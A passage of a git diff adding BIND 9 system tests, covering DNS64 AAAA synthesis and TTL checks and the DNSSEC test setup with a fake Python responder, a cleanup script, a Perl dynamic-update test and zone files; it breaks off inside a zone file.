($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-excluded-bad-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-excluded-good-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-a-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::102:305" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-a-and-aaaa.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-a-not-mapped.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2" dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME a-not-mapped.signed." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-mx-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME mx-only.signed." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-non-existent.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking reverse mapping ($n)" +ret=0 +$DIG $DIGOPTS -x 2001:aaaa::10.0.0.1 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i "CNAME.1.0.0.10.IN-ADDR.ARPA.$" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +list=`$DIG $DIGOPTS -b 10.53.0.6 @10.53.0.2 +short aaaa a-only.example | sort` +for a in $list +do + ret=0 + echo_i "checking reverse mapping of $a ($n)" + $DIG $DIGOPTS -x $a @10.53.0.2 > dig.out.ns2.test$n || ret=1 + grep -i "CNAME.5.3.2.1.IN-ADDR.ARPA." dig.out.ns2.test$n > /dev/null || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +rev=`$ARPANAME 2001:aaaa::10.0.0.1` +regex='..\(.*.IP6.ARPA\)' +rev=`expr "${rev}" : "${regex}"` +fin=`expr "${rev}" : "............${regex}"` +while test "${rev}" != "${fin}" +do + ret=0 + echo_i "checking $rev ($n)" + $DIG $DIGOPTS $rev ptr @10.53.0.2 > dig.out.ns2.test$n || ret=1 + grep -i "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 + grep -i "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + rev=`expr "${rev}" : "${regex}"` +done + +echo_i "checking dns64-server and dns64-contact ($n)" +ret=0 +$DIG $DIGOPTS soa 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.a.a.a.a.1.0.0.2.ip6.arpa @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "SOA.dns64.example.net..hostmaster.example.net." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL less than 600 from zone ($n)" +ret=0 +#expect 500 +$DIG $DIGOPTS aaaa ttl-less-than-600.example +rec @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep -i "ttl-less-than-600.example..500.IN.AAAA" dig.out.ns1.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL more than 600 from zone ($n)" +ret=0 +#expect 700 +$DIG $DIGOPTS aaaa ttl-more-than-600.example +rec @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep -i "ttl-more-than-600.example..700.IN.AAAA" dig.out.ns1.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL less than minimum from zone ($n)" +ret=0 +#expect 1100 +$DIG $DIGOPTS aaaa ttl-less-than-minimum.example +rec @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep -i "ttl-less-than-minimum.example..1100.IN.AAAA" dig.out.ns1.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL limited to minimum from zone ($n)" +ret=0 +#expect 1200 +$DIG $DIGOPTS aaaa ttl-more-than-minimum.example +rec @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep -i "ttl-more-than-minimum.example..1200.IN.AAAA" dig.out.ns1.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL less than 600 via cache ($n)" +ret=0 +#expect 500 +$DIG $DIGOPTS aaaa ttl-less-than-600.example +rec -b 10.53.0.2 @10.53.0.2 > dig.out.ns1.test$n || ret=1 +grep -i "ttl-less-than-600.example..500.IN.AAAA" dig.out.ns1.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL more than 600 via cache ($n)" +ret=0 +#expect 700 +$DIG $DIGOPTS aaaa ttl-more-than-600.example +rec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i "ttl-more-than-600.example..700.IN.AAAA" dig.out.ns2.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL less than minimum via cache ($n)" +ret=0 +#expect 1100 +$DIG $DIGOPTS aaaa ttl-less-than-minimum.example +rec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i "ttl-less-than-minimum.example..1100.IN.AAAA" dig.out.ns2.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL limited to minimum via cache ($n)" +ret=0 +#expect 1200 +$DIG $DIGOPTS aaaa ttl-more-than-minimum.example +rec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i "ttl-more-than-minimum.example..1200.IN.AAAA" dig.out.ns2.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking synthesis of AAAA from RPZ-remapped A ($n)" +ret=0 +$DIG $DIGOPTS aaaa rpz.example +rec -b 10.53.0.7 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i 'rpz.example.*IN.AAAA.2001:96::a0a:a0a' dig.out.ns2.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dnssec/README b/bin/tests/system/dnssec/README new file mode 100644 index 0000000..fcaa3b6 --- /dev/null +++ b/bin/tests/system/dnssec/README @@ -0,0 +1,32 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +The test setup for the DNSSEC tests has a secure root. + +ns1 is the root server. + +ns2 and ns3 are authoritative servers for the various test domains. + +ns4 is a caching-only server, configured with the correct trusted key +for the root. + +ns5 is a caching-only server, configured with the an incorrect trusted +key for the root. It is used for testing failure cases. + +ns6 is an caching and authoritative server used for testing unusual +server behaviors such as disabled DNSSEC algorithms. + +ns7 is used for checking non-cacheable answers. + +ns8 is a caching-only server, configured with unsupported and disabled +algorithms. It is used for testing failure cases. + +ns9 is a forwarding-only server. diff --git a/bin/tests/system/dnssec/ans10/ans.py b/bin/tests/system/dnssec/ans10/ans.py new file mode 100644 index 0000000..dbe49e5 --- /dev/null +++ b/bin/tests/system/dnssec/ans10/ans.py @@ -0,0 +1,158 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import time +import functools + +import dns, dns.message, dns.query, dns.flags +from dns.rdatatype import * +from dns.rdataclass import * +from dns.rcode import * +from dns.name import * + + +# Log query to file +def logquery(type, qname): + with open("qlog", "a") as f: + f.write("%s %s\n", type, qname) + + +############################################################################ +# Respond to a DNS query. +# SOA gets a unsigned response. +# NS gets a unsigned response. +# DNSKEY get a unsigned NODATA response. +# A gets a signed response. +# All other types get a unsigned NODATA response. +############################################################################ +def create_response(msg): + m = dns.message.from_wire(msg) + qname = m.question[0].name.to_text() + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + + with open("query.log", "a") as f: + f.write("%s %s\n" % (typename, qname)) + print("%s %s" % (typename, qname), end=" ") + + r = dns.message.make_response(m) + r.set_rcode(NOERROR) + if rrtype == A: + now = datetime.today() + expire = now + timedelta(days=30) + inception = now - timedelta(days=1) + rrsig = ( + "A 13 2 60 " + + expire.strftime("%Y%m%d%H%M%S") + + " " + + inception.strftime("%Y%m%d%H%M%S") + + " 12345 " + + qname + + " gB+eISXAhSPZU2i/II0W9ZUhC2SCIrb94mlNvP5092WAeXxqN/vG43/1nmDl" + + "y2Qs7y5VCjSMOGn85bnaMoAc7w==" + ) + r.answer.append(dns.rrset.from_text(qname, 1, IN, A, "10.53.0.10")) + r.answer.append(dns.rrset.from_text(qname, 1, IN, RRSIG, rrsig)) + elif rrtype == NS: + r.answer.append(dns.rrset.from_text(qname, 1, IN, NS, ".")) + elif rrtype == SOA: + r.answer.append(dns.rrset.from_text(qname, 1, IN, SOA, ". . 0 0 0 0 0")) + else: + r.authority.append(dns.rrset.from_text(qname, 1, IN, SOA, ". . 0 0 0 0 0")) + r.flags |= dns.flags.AA + return r + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. +############################################################################ +ip4 = "10.53.0.10" +ip6 = "fd92:7065:b8e:ffff::10" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +query4_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_socket.bind((ip4, port)) +havev6 = True +try: + query6_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + try: + query6_socket.bind((ip6, port)) + except: + query6_socket.close() + havev6 = False +except: + havev6 = False +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Listening on %s port %d" % (ip4, port)) +if havev6: + print("Listening on %s port %d" % (ip6, port)) +print("Ctrl-c to quit") + +if havev6: + input = [query4_socket, query6_socket] +else: + input = [query4_socket] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + except KeyboardInterrupt: + break + + for s in inputready: + if s == query4_socket or s == query6_socket: + print( + "Query received on %s" % (ip4 if s == query4_socket else ip6), end=" " + ) + # Handle incoming queries + msg = s.recvfrom(65535) + rsp = create_response(msg[0]) + if rsp: + print(dns.rcode.to_text(rsp.rcode())) + s.sendto(rsp.to_wire(), msg[1]) + else: + print("NO RESPONSE") + if not running: + break diff --git a/bin/tests/system/dnssec/clean.sh b/bin/tests/system/dnssec/clean.sh new file mode 100644 index 0000000..28e72ba --- /dev/null +++ b/bin/tests/system/dnssec/clean.sh @@ -0,0 +1,116 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +rm -f ./*/K* ./*/keyset-* ./*/dsset-* ./*/signedkey-* ./*/*.signed +rm -f ./*/example.bk +rm -f ./*/named.conf +rm -f ./*/named.memstats +rm -f ./*/named.run ./*/named.run.prev +rm -f ./*/named.secroots +rm -f ./*/tmp* ./*/*.jnl ./*/*.bk ./*/*.jbk +rm -f ./*/trusted.conf ./*/managed.conf ./*/revoked.conf +rm -f ./Kexample.* ./Kkeygen* ./keygen*.err +rm -f ./ans10/query.log ./ans10/ans.run +rm -f ./canonical?.* +rm -f ./delv.out* +rm -f ./delve.out* +rm -f ./dig.out.* +rm -f ./ns2/too-many-iterations.db +rm -f ./dnssectools.out* +rm -f ./dsfromkey.out.* +rm -f ./keygen.err +rm -f ./named.secroots.test* +rm -f ./nosign.before +rm -f ./ns*/*.nta +rm -f ./ns*/managed-keys.bind ./ns*/managed-keys.bind.jnl ./ns*/*.mkeys* +rm -f ./ns*/named.lock +rm -f ./ns1/managed.key.id +rm -f ./ns1/root.db ./ns2/example.db ./ns2/managed.db ./ns2/trusted.db +rm -f ./ns1/trusted.keys +rm -f ./ns2/algroll.db +rm -f ./ns2/badparam.db ./ns2/badparam.db.bad +rm -f ./ns2/cdnskey-kskonly.secure.db +rm -f ./ns2/cdnskey-kskonly.secure.id +rm -f ./ns2/cdnskey-update.secure.db +rm -f ./ns2/cdnskey-x.secure.db +rm -f ./ns2/cdnskey.secure.db +rm -f ./ns2/cds-auto.secure.db ./ns2/cds-auto.secure.db.jnl +rm -f ./ns2/cds-kskonly.secure.db +rm -f ./ns2/cds-kskonly.secure.id +rm -f ./ns2/cds-update.secure.db ./ns2/cds-update.secure.db.jnl +rm -f ./ns2/cds.secure.db ./ns2/cds-x.secure.db +rm -f ./ns2/in-addr.arpa.db +rm -f ./ns2/nsec3chain-test.db +rm -f ./ns2/single-nsec3.db +rm -f ./ns2/updatecheck-kskonly.secure.* +rm -f ./ns3/auto-nsec.example.db ./ns3/auto-nsec3.example.db +rm -f ./ns3/badds.example.db +rm -f ./ns3/dname-at-apex-nsec3.example.db +rm -f ./ns3/dnskey-nsec3-unknown.example.db +rm -f ./ns3/dnskey-nsec3-unknown.example.db.tmp +rm -f ./ns3/dnskey-unknown.example.db +rm -f ./ns3/dnskey-unknown.example.db.tmp +rm -f ./ns3/dnskey-unsupported-2.example.db +rm -f ./ns3/dnskey-unsupported-2.example.db.tmp +rm -f ./ns3/dnskey-unsupported.example.db +rm -f ./ns3/dnskey-unsupported.example.db.tmp +rm -f ./ns3/dynamic.example.db ./ns3/dynamic.example.db.signed.jnl +rm -f ./ns3/expired.example.db ./ns3/update-nsec3.example.db +rm -f ./ns3/expiring.example.db ./ns3/nosign.example.db +rm -f ./ns3/future.example.db ./ns3/trusted-future.key +rm -f ./ns3/inline.example.db.signed +rm -f ./ns3/kskonly.example.db +rm -f ./ns3/lower.example.db ./ns3/upper.example.db ./ns3/upper.example.db.lower +rm -f ./ns3/managed-future.example.db +rm -f ./ns3/multiple.example.db ./ns3/nsec3-unknown.example.db ./ns3/nsec3.example.db +rm -f ./ns3/nsec3.nsec3.example.db +rm -f ./ns3/nsec3.optout.example.db +rm -f ./ns3/occluded.example.db +rm -f ./ns3/optout-unknown.example.db ./ns3/optout.example.db +rm -f ./ns3/optout.nsec3.example.db +rm -f ./ns3/optout.optout.example.db +rm -f ./ns3/publish-inactive.example.db +rm -f ./ns3/revkey.example.db +rm -f ./ns3/rsasha256.example.db ./ns3/rsasha512.example.db +rm -f ./ns3/secure.below-cname.example.db +rm -f ./ns3/secure.example.db ./ns3/*.managed.db ./ns3/*.trusted.db +rm -f ./ns3/secure.nsec3.example.db +rm -f ./ns3/secure.optout.example.db +rm -f ./ns3/siginterval.conf +rm -f ./ns3/siginterval.example.db +rm -f ./ns3/split-dnssec.example.db +rm -f ./ns3/split-smart.example.db +rm -f ./ns3/ttlpatch.example.db ./ns3/ttlpatch.example.db.signed +rm -f ./ns3/ttlpatch.example.db.patched +rm -f ./ns3/unsecure.example.db ./ns3/bogus.example.db ./ns3/keyless.example.db +rm -f ./ns3/unsupported.managed.db.tmp ./ns3/unsupported.trusted.db.tmp +rm -f ./ns4/named_dump.db* +rm -f ./ns6/optout-tld.db +rm -f ./ns7/multiple.example.bk ./ns7/nsec3.example.bk ./ns7/optout.example.bk +rm -f ./ns7/split-rrsig.db ./ns7/split-rrsig.db.unsplit +rm -f ./nsupdate.out* +rm -f ./python.out.* +rm -f ./rndc.out.* +rm -f ./signer/*.db +rm -f ./signer/*.signed.post* +rm -f ./signer/*.signed.pre* +rm -f ./signer/example.db.after ./signer/example.db.before +rm -f ./signer/example.db.changed +rm -f ./signer/general/dsset* +rm -f ./signer/general/signed.zone +rm -f ./signer/general/signer.out.* +rm -f ./signer/nsec3param.out +rm -f ./signer/signer.out.* +rm -f ./signing.out* diff --git a/bin/tests/system/dnssec/dnssec_update_test.pl b/bin/tests/system/dnssec/dnssec_update_test.pl new file mode 100644 index 0000000..a06c563 --- /dev/null +++ b/bin/tests/system/dnssec/dnssec_update_test.pl @@ -0,0 +1,99 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# DNSSEC Dynamic update test suite. +# +# Usage: +# +# perl update_test.pl [-s server] [-p port] zone +# +# The server defaults to 127.0.0.1. +# The port defaults to 53. +# +# Installation notes: +# +# This program uses the Net::DNS::Resolver module. +# You can install it by saying +# +# perl -MCPAN -e "install Net::DNS" +# + +use Getopt::Std; +use Net::DNS; +use Net::DNS::Update; +use Net::DNS::Resolver; + +$opt_s = "127.0.0.1"; +$opt_p = 53; + +getopt('s:p:'); + +$res = new Net::DNS::Resolver; +$res->nameservers($opt_s); +$res->port($opt_p); +$res->defnames(0); # Do not append default domain. + +@ARGV == 1 or die + "usage: perl update_test.pl [-s server] [-p port] zone\n"; + +$zone = shift @ARGV; + +my $failures = 0; + +sub assert { + my ($cond, $explanation) = @_; + if (!$cond) { + print "Test Failed: $explanation ***\n"; + $failures++ + } +} + +sub test { + my ($expected, @records) = @_; + + my $update = new Net::DNS::Update("$zone"); + + foreach $rec (@records) { + $update->push(@$rec); + } + + $reply = $res->send($update); + + # Did it work? + if (defined $reply) { + my $rcode = $reply->header->rcode; + assert($rcode eq $expected, "expected $expected, got $rcode"); + } else { + print "Update failed: ", $res->errorstring, "\n"; + } +} + +sub section { + my ($msg) = @_; + print "$msg\n"; +} + +section("Add a name"); +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.49")]); + +section("Delete the name"); +test("NOERROR", ["update", rr_del("a.$zone")]); + +if ($failures) { + print "$failures update tests failed.\n"; +} else { + print "All update tests successful.\n"; +} + +exit $failures; diff --git a/bin/tests/system/dnssec/ns1/named.conf.in b/bin/tests/system/dnssec/ns1/named.conf.in new file mode 100644 index 0000000..bd1ccc4 --- /dev/null +++ b/bin/tests/system/dnssec/ns1/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; + /* test that we can turn off trust-anchor-telemetry */ + trust-anchor-telemetry no; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dnssec/ns1/root.db.in b/bin/tests/system/dnssec/ns1/root.db.in new file mode 100644 index 0000000..526e36c --- /dev/null +++ b/bin/tests/system/dnssec/ns1/root.db.in @@ -0,0 +1,37 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 +algroll. NS ns2.algroll. +ns2.algroll. A 10.53.0.2 +managed. NS ns2.managed. +ns2.managed. A 10.53.0.2 +trusted. NS ns2.trusted. +ns2.trusted. A 10.53.0.2 +optout-tld NS ns6.optout-tld. +ns6.optout-tld. A 10.53.0.6 +in-addr.arpa. NS ns2.example. +inprogress. NS ns10.inprogress. +ns10.inprogress. A 10.53.0.10 +too-many-iterations. NS ns2.too-many-iterations. +ns2.too-many-iterations. A 10.53.0.2 diff --git a/bin/tests/system/dnssec/ns1/sign.sh b/bin/tests/system/dnssec/ns1/sign.sh new file mode 100644 index 0000000..563dc96 --- /dev/null +++ b/bin/tests/system/dnssec/ns1/sign.sh @@ -0,0 +1,62 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +zone=. +infile=root.db.in +zonefile=root.db + +(cd ../ns2 && $SHELL sign.sh ) +(cd ../ns6 && $SHELL sign.sh ) +(cd ../ns7 && $SHELL sign.sh ) + +echo_i "ns1/sign.sh" + +cp "../ns2/dsset-example$TP" . +cp "../ns2/dsset-in-addr.arpa$TP" . +cp "../ns2/dsset-too-many-iterations$TP" . + +grep "$DEFAULT_ALGORITHM_NUMBER [12] " "../ns2/dsset-algroll$TP" > "dsset-algroll$TP" +cp "../ns6/dsset-optout-tld$TP" . + +ksk=$("$KEYGEN" -q -fk -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +zsk=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$ksk.key" "$zsk.key" > "$zonefile" + +"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1 + +# Configure the resolving server with a staitc key. +keyfile_to_static_ds "$ksk" > trusted.conf +cp trusted.conf ../ns2/trusted.conf +cp trusted.conf ../ns3/trusted.conf +cp trusted.conf ../ns4/trusted.conf +cp trusted.conf ../ns6/trusted.conf +cp trusted.conf ../ns7/trusted.conf +cp trusted.conf ../ns9/trusted.conf + +keyfile_to_trusted_keys "$ksk" > trusted.keys + +# ...or with an initializing key. +keyfile_to_initial_ds "$ksk" > managed.conf +cp managed.conf ../ns4/managed.conf + +# +# Save keyid for managed key id test. +# + +keyfile_to_key_id "$ksk" > managed.key.id diff --git a/bin/tests/system/dnssec/ns2/algroll.db.in b/bin/tests/system/dnssec/ns2/algroll.db.in new file mode 100644 index 0000000..6f66fc9 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/algroll.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 30 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 30 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 diff --git a/bin/tests/system/dnssec/ns2/badparam.db.in b/bin/tests/system/dnssec/ns2/badparam.db.in new file mode 100644 index 0000000..b18d186 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/badparam.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2010081000 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 diff --git a/bin/tests/system/dnssec/ns2/cdnskey-auto.secure.db.in b/bin/tests/system/dnssec/ns2/cdnskey-auto.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cdnskey-auto.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cdnskey-kskonly.secure.db.in b/bin/tests/system/dnssec/ns2/cdnskey-kskonly.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cdnskey-kskonly.secure.db.in @@ 